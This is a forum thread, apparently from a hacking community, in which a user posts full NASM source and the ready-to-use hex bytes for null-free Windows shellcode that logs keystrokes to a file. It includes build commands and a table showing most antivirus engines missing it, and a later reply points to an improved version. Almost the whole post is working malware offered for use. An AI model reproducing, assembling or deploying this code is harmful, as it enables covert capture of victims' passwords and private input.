Jump to content

win32 null-free shellcode keylogger


fugu
 Share

Recommended Posts

I hope the formatting holds up

; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes
; Date: Sat Apr 23 18:34:25 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
;       it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
;       "Virtual-Key Codes", from msdn.microsoft.com website
; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
; dd if=test.exe bs=1 status=none skip=$((0x200)) count=$((0x3AE-0x200+1)) | xxd -ps | tr -d '\n'; echo

section .bss

section .data

section .text
   global _start
      _start:
    cld  								; 00000000 FC
    xor edx,edx  							; 00000001 31D2
    mov dl,0x30  							; 00000003 B230
    push dword [fs:edx]  						; 00000005 64FF32
    pop edx  								; 00000008 5A
    mov edx,[edx+0xc]  							; 00000009 8B520C
    mov edx,[edx+0x14]  						; 0000000C 8B5214
loc_fh:
    mov esi,[edx+0x28]  						; 0000000F 8B7228
    xor eax,eax  							; 00000012 31C0
    mov ecx,eax  							; 00000014 89C1
    mov cl,0x3  							; 00000016 B103
loc_18h:
    lodsb  								; 00000018 AC
    rol eax,byte 0x8  							; 00000019 C1C008
    lodsb  								; 0000001C AC
    loop loc_18h  							; 0000001D E2F9
    lodsb  								; 0000001F AC
    cmp eax,0x4b45524e  						; 00000020 3D4E52454B
    jz loc_2ch  							; 00000025 7405
    cmp eax,0x6b65726e  						; 00000027 3D6E72656B
loc_2ch:
    mov ebx,[edx+0x10]  						; 0000002C 8B5A10
    mov edx,[edx]  							; 0000002F 8B12
    jnz loc_fh  							; 00000031 75DC
    mov edx,[ebx+0x3c]  						; 00000033 8B533C
    add edx,ebx  							; 00000036 01DA
    push dword [edx+0x34]  						; 00000038 FF7234
    mov edx,[edx+0x78]  						; 0000003B 8B5278
    add edx,ebx  							; 0000003E 01DA
    mov esi,[edx+0x20]  						; 00000040 8B7220
    add esi,ebx  							; 00000043 01DE

;GetProcAddress
    xor ecx,ecx  							; 00000045 31C9
loc_47h:
    inc ecx  								; 00000047 41
    lodsd  								; 00000048 AD
    add eax,ebx  							; 00000049 01D8
    cmp dword [eax],0x50746547  					; 0000004B 813847657450
    jnz loc_47h  							; 00000051 75F4
    cmp dword [eax+0x4],0x41636f72  					; 00000053 817804726F6341
    jnz loc_47h  							; 0000005A 75EB
    cmp dword [eax+0x8],0x65726464  					; 0000005C 81780864647265
    jnz loc_47h  							; 00000063 75E2
    dec ecx  								; 00000065 49
    mov esi,[edx+0x24]  						; 00000066 8B7224
    add esi,ebx  							; 00000069 01DE
    mov cx,[esi+ecx*2]  						; 0000006B 668B0C4E
    mov esi,[edx+0x1c]  						; 0000006F 8B721C
    add esi,ebx  							; 00000072 01DE
    mov edx,[esi+ecx*4]  						; 00000074 8B148E
    add edx,ebx  							; 00000077 01DA
    mov edi,edx  							; 00000079 89D7
    push edx  								; 0000007B 52

;GetModuleHandleA
    xor eax,eax  							; 0000007C 31C0
    push eax  								; 0000007E 50
    push dword 0x41656c64  						; 0000007F 68646C6541
    push dword 0x6e614865  						; 00000084 686548616E
    push dword 0x6c75646f  						; 00000089 686F64756C
    push dword 0x4d746547  						; 0000008E 684765744D
    push esp  								; 00000093 54
    push ebx  								; 00000094 53
    call edi  								; 00000095 FFD7
    lea esp,[esp+0x14]  						; 00000097 8D642414
    push eax  								; 0000009B 50

;GetModuleHandleA("USER32.DLL")
    push dword 0x88014c4c  						; 0000009C 684C4C0188
    dec byte [esp+0x2]  						; 000000A1 FE4C2402
    push dword 0x442e3233  						; 000000A5 6833322E44
    push dword 0x52455355  						; 000000AA 6855534552
    push esp  								; 000000AF 54
    call eax  								; 000000B0 FFD0
    xor edx,edx  							; 000000B2 31D2
    cmp eax,edx  							; 000000B4 39D0
    jnz loc_f0h  							; 000000B6 7538
    lea esp,[esp+0xc]  							; 000000B8 8D64240C

;LoadLibraryA
    push edx  								; 000000BC 52
    push dword 0x41797261  						; 000000BD 6861727941
    push dword 0x7262694c  						; 000000C2 684C696272
    push dword 0x64616f4c  						; 000000C7 684C6F6164
    push esp  								; 000000CC 54
    push ebx  								; 000000CD 53
    call edi  								; 000000CE FFD7
    lea esp,[esp+0x10]  						; 000000D0 8D642410
    push eax  								; 000000D4 50

;LoadLibraryA("USER32.DLL")
    push dword 0x77014c4c  						; 000000D5 684C4C0177
    dec byte [esp+0x2]  						; 000000DA FE4C2402
    push dword 0x442e3233  						; 000000DE 6833322E44
    push dword 0x52455355  						; 000000E3 6855534552
    push esp  								; 000000E8 54
    call eax  								; 000000E9 FFD0
    lea esp,[esp+0xc]  							; 000000EB 8D64240C
    push eax  								; 000000EF 50

;GetKeyState
loc_f0h:
    mov edx,eax  							; 000000F0 89C2
    push dword 0x1657461  						; 000000F2 6861746501
    dec byte [esp+0x3]  						; 000000F7 FE4C2403
    push dword 0x74537965  						; 000000FB 6865795374
    push dword 0x4b746547  						; 00000100 684765744B
    push esp  								; 00000105 54
    push edx  								; 00000106 52
    call edi  								; 00000107 FFD7
    lea esp,[esp+0xc]  							; 00000109 8D64240C
    push eax  								; 0000010D 50

;WriteFile
    push dword 0x55010165  						; 0000010E 6865010155
    dec byte [esp+0x1]  						; 00000113 FE4C2401
    push dword 0x6c694665  						; 00000117 686546696C
    push dword 0x74697257  						; 0000011C 6857726974
    push esp  								; 00000121 54
    push ebx  								; 00000122 53
    call edi  								; 00000123 FFD7
    lea esp,[esp+0xc]  							; 00000125 8D64240C
    push eax  								; 00000129 50

;CreateFileA
    push dword 0x141656c  						; 0000012A 686C654101
    dec byte [esp+0x3]  						; 0000012F FE4C2403
    push dword 0x69466574  						; 00000133 6874654669
    push dword 0x61657243  						; 00000138 6843726561
    push esp  								; 0000013D 54
    push ebx  								; 0000013E 53
    call edi  								; 0000013F FFD7
    lea esp,[esp+0xc]  							; 00000141 8D64240C
    push eax  								; 00000145 50

    push dword 0x16e6962  						; 00000146 6862696E01
    dec byte [esp+0x3]  						; 0000014B FE4C2403
    push dword 0x2e676f6c  						; 0000014F 686C6F672E

    xor ecx,ecx  							; 00000154 31C9
    push ecx  								; 00000156 51
    push ecx  								; 00000157 51
    add byte [esp],0x80  						; 00000158 80042480
    push byte +0x4  							; 0000015C 6A04
    push ecx  								; 0000015E 51
    push byte +0x2  							; 0000015F 6A02
    push ecx  								; 00000161 51
    add byte [esp],0x4  						; 00000162 80042404
    lea ecx,[esp+0x18]  						; 00000166 8D4C2418
    push ecx  								; 0000016A 51
    call eax  								; 0000016B FFD0
    lea esp,[esp+0x8]  							; 0000016D 8D642408
    push eax  								; 00000171 50

;main loop
loc_172h:
    xor ecx,ecx  							; 00000172 31C9
    xor esi,esi  							; 00000174 31F6
loc_176h:
    mov cl,0xff  							; 00000176 B1FF
    mov eax,esi  							; 00000178 89F0
    cmp al,cl  								; 0000017A 38C8
    jc loc_180h  							; 0000017C 7202
    xor esi,esi  							; 0000017E 31F6
loc_180h:
    inc esi  								; 00000180 46
    push esi  								; 00000181 56
    call dword [esp+0x10]  						; 00000182 FF542410
    mov edx,esi  							; 00000186 89F2
    xor ecx,ecx  							; 00000188 31C9
    mov cl,0x80  							; 0000018A B180
    and eax,ecx  							; 0000018C 21C8
    xor ecx,ecx  							; 0000018E 31C9
    cmp eax,ecx  							; 00000190 39C8
    jz loc_176h  							; 00000192 74E2

    push edx  								; 00000194 52
    push ecx  								; 00000195 51
    lea ecx,[esp]  							; 00000196 8D0C24
    push ecx  								; 00000199 51
    push byte +0x1  							; 0000019A 6A01
    lea ecx,[esp+0xc]  							; 0000019C 8D4C240C
    push ecx  								; 000001A0 51
    push dword [esp+0x14]  						; 000001A1 FF742414
    call dword [esp+0x20]  						; 000001A5 FF542420
    lea esp,[esp+0x4]  							; 000001A9 8D642404
    jmp short loc_172h  						; 000001AD EBC3
;the actual shellcode fc31d2b23064ff325a8b520c8b52148b722831c089c1b103acc1c008ace2f9ac3d4e52454b74053d6e72656b8b5a108b1275dc8b533c01daff72348b527801da8b722001de31c941ad01d881384765745075f4817804726f634175eb8178086464726575e2498b722401de668b0c4e8b721c01de8b148e01da89d75231c05068646c6541686548616e686f64756c684765744d5453ffd78d64241450684c4c0188fe4c24026833322e44685553455254ffd031d239d075388d64240c526861727941684c696272684c6f61645453ffd78d64241050684c4c0177fe4c24026833322e44685553455254ffd08d64240c5089c26861746501fe4c24036865795374684765744b5452ffd78d64240c506865010155fe4c2401686546696c68577269745453ffd78d64240c50686c654101fe4c2403687465466968437265615453ffd78d64240c506862696e01fe4c2403686c6f672e31c95151800424806a04516a0251800424048d4c241851ffd08d6424085031c931f6b1ff89f038c8720231f64656ff54241089f231c9b18021c831c939c874e252518d0c24516a018d4c240c51ff742414ff5424208d642404ebc3
Link to comment
Share on other sites

can you show virus scan results?

SHA256: 	525dd24ac394e238404fe08504891bab80168c80fba1e396827a8683b697845c
File name: 	test.exe
Detection ratio: 	5 / 56
Analysis date: 	2016-04-27 04:09:53 UTC ( 1 minute ago )
0
0

    Analysis
    File detail
    Additional information
    Comments
    Votes
    Behavioural information

Antivirus 	Result 	Update
Avira (no cloud) 	TR/Crypt.XPACK.Gen 	20160426
NANO-Antivirus 	Virus.Win32.Gen.ccmw 	20160427
Qihoo-360 	HEUR/QVM20.1.0000.Malware.Gen 	20160427
Sophos 	Mal/EncPk-ND 	20160427
VBA32 	Heur.Trojan.Hlux 	20160425
ALYac 		20160427
AVG 		20160427
AVware 		20160427
Ad-Aware 		20160427
AegisLab 		20160426
AhnLab-V3 		20160426
Alibaba 		20160426
Antiy-AVL 		20160427
Arcabit 		20160427
Avast 		20160427
Baidu 		20160426
Baidu-International 		20160426
BitDefender 		20160427
Bkav 		20160427
CAT-QuickHeal 		20160427
CMC 		20160425
ClamAV 		20160426
Comodo 		20160426
Cyren 		20160427
DrWeb 		20160427
ESET-NOD32 		20160427
Emsisoft 		20160427
F-Prot 		20160427
F-Secure 		20160427
Fortinet 		20160425
GData 		20160427
Ikarus 		20160426
Jiangmin 		20160427
K7AntiVirus 		20160426
K7GW 		20160427
Kaspersky 		20160427
Kingsoft 		20160427
Malwarebytes 		20160427
McAfee 		20160427
McAfee-GW-Edition 		20160427
eScan 		20160427
Microsoft 		20160427
Panda 		20160426
Rising 		20160427
SUPERAntiSpyware 		20160427
Symantec 		20160427
Tencent 		20160427
TheHacker 		20160426
TrendMicro 		20160427
TrendMicro-HouseCall 		20160427
VIPRE 		20160427
ViRobot 		20160427
Yandex 		20160426
Zillya 		20160426
Zoner 		20160427
nProtect 		20160426 
Link to comment
Share on other sites

  • 1 month later...
On 6/9/2016 at 11:22 AM, AllCNICoFounder said:

Thank you so much for this <:

No problem:) There is a slightly better version of this at the Exploit DB www.exploit-db.com under shellcodes, which doesn't spam the log file or bog down the CPU.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...